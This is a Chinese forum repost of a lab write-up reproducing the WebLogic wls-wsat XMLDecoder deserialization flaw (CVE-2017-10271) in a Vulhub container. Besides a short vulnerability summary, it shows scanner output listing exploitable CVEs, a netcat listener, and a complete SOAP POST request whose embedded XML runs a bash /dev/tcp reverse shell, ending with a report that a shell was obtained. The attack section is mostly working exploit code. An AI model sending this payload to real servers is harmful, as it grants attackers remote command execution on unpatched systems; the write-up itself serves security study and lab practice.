翼度科技»论坛 编程开发 .net 查看内容

weblogic-10.3.6-'wls-wsat'-XMLDecoder反序列化漏洞-(CVE-2017-10

11

主题

11

帖子

33

积分

新手上路

Rank: 1

积分
33
目录

说明内容漏洞编号CVE-2017-10271漏洞名称Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)漏洞评级高危影响范围10.3.6漏洞描述Weblogic的WLS Security组件对外提供webservice服务
其中使用了XMLDecoder来解析用户传入的XML数据
在解析的过程中出现反序列化漏洞,导致可执行任意命令修复方案打补丁
上设备
升级组件1.1、漏洞描述

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令
1.2、漏洞等级

高危
1.3、影响版本

10.3.6
1.4、漏洞复现

1、基础环境

Path:Vulhub/weblogic/CVE-2017-10271
启动测试环境:
  1. sudo docker-compose up -d
复制代码
等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。
Weblogic的登陆地址是your-ip:7001/console

2、漏洞扫描

nacs

查看帮助信息
  1. ./nacs -h
复制代码
  1. ┌──(kali㉿kali)-[~/tools/nacs/0.0.3]
  2. └─$ sudo ./nacs -h 192.168.80.141 -pa 7001
  3. _  _     ___     ___     ___   
  4. | \| |   /   \   / __|   / __|  
  5. | .  |   | - |  | (__    \__ \
  6. |_|\_|   |_|_|   \___|   |___/  
  7.              Version: 0.0.3
  8. [05:55:53] [INFO] Start to probe alive machines
  9. [05:55:53] [*] Target 192.168.80.141 is alive
  10. [05:55:53] [INFO] There are total of 1 hosts, and 1 are surviving
  11. [05:55:53] [WARNING] Too few surviving hosts
  12. [05:55:53] [INFO] Start to discover the ports
  13. [05:55:53] [*] [TCP/SSH] ssh://192.168.80.141:22 [SSH-2.0-OpenSSH_9.2p1\x20Debian-2]
  14. [05:55:59] [*] [TCP/HTTP] [404] [JSP] [Servlet] [Weblogic] http://192.168.80.141:7001 [None]
  15. [05:55:59] [INFO] A total of 2 targets, the rule base hits 2 targets
  16. [05:55:59] [INFO] Start to send pocs to web services (xray type)
  17. [05:55:59] [INFO] Load 397 xray poc(s)
  18. [05:56:01] [+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2019-2729-2
  19. [05:56:02] [+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2019-2725 v10
  20. [05:56:12] [+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2017-10271 reverse
  21. [05:57:01] [INFO] Start to process nonweb services
  22. [05:57:01] [INFO] [protocol] ssh 192.168.80.141
  23. [05:59:29] [INFO] Task finish, consumption of time: 3m35.385936144s                                                                     
复制代码
weblogicScanner

项目地址:https://github.com/0xn0ne/weblogicScanner
  1. ┌──(kali㉿kali)-[~/tools/weblogic/weblogicScanner]
  2. └─$ python ws.py -t 192.168.80.141                                    
  3. [06:02:31][INFO] [-][CVE-2018-2894][192.168.80.141:7001] Not found.
  4. [06:02:33][INFO] [+][CVE-2017-10271][192.168.80.141:7001] Exists vulnerability!
  5. [06:02:33][INFO] [+][CVE-2014-4210][192.168.80.141:7001] Found module, Please verify manually!
  6. [06:02:38][INFO] [-][CVE-2019-2890][192.168.80.141:7001] Not vulnerability.
  7. [06:02:39][INFO] [-][CVE-2016-0638][192.168.80.141:7001] Not vulnerability.
  8. [06:02:39][INFO] [!][CVE-2018-3245][192.168.80.141:7001] Connection error.
  9. [06:02:39][INFO] [-][CVE-2018-3245][192.168.80.141:7001] Not vulnerability.
  10. [06:02:40][INFO] [-][CVE-2018-3191][192.168.80.141:7001] Not vulnerability.
  11. [06:02:40][INFO] [-][CVE-2020-2883][192.168.80.141:7001] Not vulnerability.
  12. [06:02:40][INFO] [-][CVE-2020-2555][192.168.80.141:7001] Not vulnerability.
  13. [06:02:42][INFO] [+][CVE-2020-2551][192.168.80.141:7001] Found module, Please verify manually!
  14. [06:02:42][INFO] [+][CVE-2019-2618][192.168.80.141:7001] Found module, Please verify manually!
  15. [06:02:43][INFO] [+][CVE-2019-2725][192.168.80.141:7001] Exists vulnerability!
  16. [06:02:43][INFO] [+][CVE-2018-3252][192.168.80.141:7001] Found module, Please verify manually!
  17. [06:02:43][INFO] [+][CVE-2020-14750][192.168.80.141:7001] Exists vulnerability!
  18. [06:02:43][INFO] [+][CVE-2019-2888][192.168.80.141:7001] Found module, Please verify manually!
  19. [06:02:44][INFO] [!][CVE-2020-14882][192.168.80.141:7001] Connection error.
  20. [06:02:44][INFO] [-][CVE-2020-14882][192.168.80.141:7001] Not vulnerability.
  21. [06:02:44][INFO] [+][CVE-2019-2729][192.168.80.141:7001] Exists vulnerability!
  22. [06:02:45][INFO] [+][CVE-2018-2893][192.168.80.141:7001] Exists vulnerability!
  23. [06:02:45][INFO] [+][CVE-2017-3506][192.168.80.141:7001] Exists vulnerability!
  24. [06:02:46][INFO] [+][CVE-2016-3510][192.168.80.141:7001] Exists vulnerability!
  25. [06:02:47][INFO] [+][CVE-2017-3248][192.168.80.141:7001] Exists vulnerability!
  26. [06:02:48][INFO] [-][CVE-2018-2628][192.168.80.141:7001] Not vulnerability.
  27. [06:02:52][INFO] [-][Weblogic Console][192.168.80.141:7001] Not found.
  28. [06:02:52][INFO] [-][CVE-2020-14883][192.168.80.141:7001] Not vulnerability.
  29. Run completed, 27 seconds total.
复制代码
3、漏洞验证

访问/wls-wsat/CoordinatorPortType页面

改变请求方式为post

kali监听21端口
  1. nc -lvp 21
复制代码
发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误):
  1. POST /wls-wsat/CoordinatorPortType HTTP/1.1
  2. Host: 192.168.80.141:7001
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh;q=0.9
  9. Cookie: ADMINCONSOLESESSION=vq4hk23V21rs9yG5nGTvYkGppFGmFrvzzM2tvtw2pSnKQCsjPmvt!-1799840789
  10. Connection: close
  11. Content-Type: text/xml
  12. Content-Length: 641
  13. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
  14. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  15. <java version="1.4.0" >
  16. <void >
  17. <array  length="3">
  18. <void index="0">
  19. <string>/bin/bash</string>
  20. </void>
  21. <void index="1">
  22. <string>-c</string>
  23. </void>
  24. <void index="2">
  25. <string>bash -i >& /dev/tcp/192.168.80.141/21 0>&1</string>
  26. </void>
  27. </array>
  28. <void method="start"/></void>
  29. </java>
  30. </work:WorkContext>
  31. </soapenv:Header>
  32. <soapenv:Body/>
  33. </soapenv:Envelope>
复制代码
成功获取shell


来源:https://www.cnblogs.com/saury/archive/2023/09/05/17680974.html
免责声明:由于采集信息均来自互联网,如果侵犯了您的权益,请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x

举报 回复 使用道具